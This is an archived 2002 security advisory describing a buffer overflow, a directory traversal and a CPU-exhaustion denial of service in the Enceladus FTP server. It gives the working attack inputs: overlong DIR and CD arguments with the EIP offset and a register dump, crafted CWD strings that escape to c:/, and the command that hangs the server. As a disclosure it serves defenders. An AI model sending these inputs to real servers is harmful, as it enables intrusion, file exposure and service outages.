Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: win5889.htm

Enceladus Server Multiple vulnerabilities



19th Dec 2002 [SBWID-5889]
COMMAND

	Multiple vulnerabilities in Enceladus Server

SYSTEMS AFFECTED

	Enceladus Server Suite (upto ??) version 3.9

PROBLEM

	Thanks to securma massine [securma@caramail.com] advisory :
	
	 1- Buffer overlow
	
	Tamer  notified  that  the  waiter  crashait  with  "long  sequence   of
	characters as an argument to "CD" command"
	
	 http://online.securityfocus.com/archive/1/302596)
	
	I believe that it passed dimensioned of a true buffer  overflow  because
	this crash allows only a overwrite ' ESP and thus a simple DOS attack
	
	50e091e3 803820 cmp byte ptr [eax],0x20 (ftpservx.dll)
	
	with argument "DIR" we can overwrite eip
	
	dir+[buffer =279byte] >> eip is overwritet at:42,43,44,45
	
	sufficient for the injection of a shellcode the state of  the  registers
	is:
	
	Access violation - code c0000005 (first chance)
	eax=0012bcb8 ebx=0012c574 ecx=61616161 edx=7846f5b5 esi=0012bce0
	edi=0019affd
	eip=61616161 esp=0012bc20 ebp=0012bc40 iopl=0 nv up ei pl zr na po nc
	cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
	efl=00000246 61616161 ?? ???
	
	it is noticed whereas the eip is at the beginning of our buffer
	
	ftp> dir aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[EIP=4BYTE]
	aaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	
	the argument "mget" gives also the same result the exploit is simple  of
	realization since ebx point towards our buffer
	
	0012c274 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
	
	
	 2- directory traversal
	
	ftp>cd ..
	access denied
	ftp>cd cd @/....\
	250 CWD command successful.
	ftp> dir
	200 PORT command successful
	150 Opening ASCII mode data connection for /bin/ls.
	drwxr-xr-x 1 User Group 0 Dec 18 12:59 anonymous-
	ftp
	drwxr-xr-x 1 User Group 0 Dec 18 12:59 downloads
	-rwxr-xr-x 1 User Group 8544 Mar 18 02:09
	emailme.html
	-rwxr-xr-x 1 User Group 878 Mar 16 04:52
	execupload.html
	-rwxr-xr-x 1 User Group 1033 Oct 27 02:22
	exitstatus.html
	-rwxr-xr-x 1 User Group 5965 Mar 18 02:12
	fileuplogin.html
	drwxr-xr-x 1 User Group 0 Dec 18 12:59 ftproot
	drwxr-xr-x 1 User Group 0 Dec 18 12:59 images
	-rwxr-xr-x 1 User Group 6783 Mar 18 02:11 index.html
	-rwxr-xr-x 1 User Group 4465 Mar 18 02:09 Links.html
	-rwxr-xr-x 1 User Group 1299 Mar 18 23:41
	mailexitstatus.html
	-rwxr-xr-x 1 User Group 4402 Mar 18 02:09
	MyPictures.html
	drwxr-xr-x 1 User Group 0 Dec 18 12:59 secure-
	downloads
	-rwxr-xr-x 1 User Group 5082 Mar 18 02:09
	signguestbook.html
	-rwxr-xr-x 1 User Group 5188 Mar 18 02:09 upload.html
	ftp> cd @@@@@@@@@@@/..c:\
	250 CWD command successful.
	ftp> dir
	200 PORT command successful
	150 Opening ASCII mode data connection for /bin/ls.
	226 Listing complete.
	ftp> pwd
	257 "c:/" is current directory.
	ftp> dir
	
	[NO COMMENT]
	
	 3-denial of service and consume cpu
	
	ftp> cd @/..@/..
	(no reponse)
	
	cpu 99% used

SOLUTION

	see http://www.mollensoft.com/


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH